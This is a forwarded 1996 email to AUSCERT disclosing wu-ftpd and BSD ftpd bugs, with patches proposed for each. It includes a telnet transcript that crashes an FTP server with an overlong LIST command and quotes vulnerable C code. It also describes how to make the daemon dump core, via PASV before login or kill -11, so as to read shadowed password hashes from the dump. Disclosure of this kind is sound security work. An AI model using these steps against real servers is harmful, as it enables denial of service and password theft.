Very Computer

---------- Forwarded message ----------
Date: Wed, 30 Oct 1996 09:21:31 +0300 (MSK)

Subject: Re: AUSCERT 9610181435 -- vuls in ftpd

Hello,

> We are preparing an advisory to issue concerning the recent vulnerabilities
> in ftpd which allow users to cause it to core dump.  We noticed your
> posting to bugtraq concerning the wu-ftpd and two vulnerabilities
> it has.

> >  wuftpd can create core dump in two following situation too (yes, dump
> >will contain some subset of shadowed passwords):>

> >1) "pasv" given when user not logged in
> >   (caused by error in passive())>

> >2) more than 100 arguments to any executable command (for example, "list")
> >   (caused by error in ftpd_popen())>

> >  First error presents in almost all version of bsd's ftpd, wu-ftpd and
> >derived. Second error presents in all versions of bsd's ftpd, wu-ftpd and
> >derived (as far as I know).

> We have been able to verify the first on the standard wu-ftpd 2.4.  We
> haven't been able to verify the second.

---------------------------------------------------------------
Script started on Wed Oct 30 09:02:34 1996

/home/vadim> telnet ftp.somewhere.in.the.world.com 21
Trying a.b.c.d...
Connected to FTP.SOMEWHERE.IN.THE.WORLD.COM.
Escape character is '^]'.
220 FTP server (Version wu-2.4.2-academ[BETA-11](1) Fri Jul 26 19:43:17 CDT 1996) ready.
user ftp
331 Guest login ok, send your complete e-mail address as password.

230 Guest login ok, access restrictions apply.
list x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x
x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x
Connection closed by foreign host.
/home/vadim>

Script done on Wed Oct 30 09:03:36 1996
-------------------------------------------------------------------------

Why it works? Here is the fragment of ftpd (file popen.c):

FILE * ftpd_popen(char *program, char *type, int closestderr)
{
    .  .  .

    char *argv[100],

    /* break up string into pieces */
    for (argc = 0, cp = program;; cp = NULL)
        if (!(argv[argc++] = strtok(cp, " \t\n")))
            break;

  As you can see, there is no checking if argument count is greater than
100. So, if I'll give any command (such as "LIST"), which executes
some binary ("ls" in this case) with more than 100 arguments, ftpd
dies and generates core dump.
  Patch is simple, of course -- add checking for "argc < 100" in cycle
header.

  Now about second error, with "pasv" command...

File ftpd.c:

void passive()
{
        int len;
        u_short port;
        char *p, *a;

        pdata = socket(AF_INET, SOCK_STREAM, 0);
        if (pdata < 0) {
                perror_reply(425, "Can't open passive connection");
                return;
        }

        if (restricted_data_ports) {
                for (port = FTP_DATA_BOTTOM; port <= FTP_DATA_TOP; port++) {
                        pasv_addr = ctrl_addr;
                        pasv_addr.sin_port = htons(port);
                        (void) seteuid((uid_t)0);
                        if (bind(pdata, (struct sockaddr *)&pasv_addr,
                                 sizeof(pasv_addr)) < 0) {
                                (void) seteuid((uid_t)pw->pw_uid);

  When no one logged in, pw == NULL, and seteuid((uid_t)pw->pw_uid) causes
core dump. Patch is very simple too -- add the following lines in start of
function (before "pdata = socket(AF_INET..."):

        if (!pw) {
                reply(530, "Please login with USER and PASS");
                return;
        }

  Third error in ftpd... kill -11
  Because ftpd runs with user's privilegies (after user logged in), user
can generate core dump by killing ftp-daemon with signal 11. If you need
more information (including example and patch), ask.

  Of course, if I want to read core dump, I have to login first to change
current dir (using "CWD") to directory like /incoming or my homedir
(if I have account on victim machine) and only then kill ftp-daemon by
'pasv', kill or 'list'...

> We'd be very interested in hearing your feedback about whether the problems
> exist under beta-11 or not.

  Those error (1, 2 and 3) presents almost in *ALL* versions of ftpd
(FreeBSD's ftpd, Solaris' ftpd and so on), because it presents in original
berkeley ftpd, which others derived from.

With best regards, Vadim.
--------------------------------------------------------------------------
Vadim Kolontsov                                          SysAdm/Programmer
Tver Regional Center of New Information Technologies          Networks Lab